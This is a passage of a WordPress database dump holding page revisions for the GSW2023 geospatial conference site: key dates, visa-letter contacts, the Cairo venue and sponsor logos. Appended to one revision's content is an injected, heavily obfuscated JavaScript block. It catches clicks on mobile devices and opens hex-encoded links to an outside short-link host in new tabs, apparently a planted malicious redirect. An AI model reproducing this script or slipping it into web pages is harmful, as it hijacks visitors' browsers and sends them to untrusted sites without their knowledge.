line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:38:17','2023-06-24 01:38:17','',3066,'https://gsw2023.com/?p=4799',0,'revision','',0),
(4800,1,'2023-06-24 01:38:52','2023-06-24 01:38:52','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 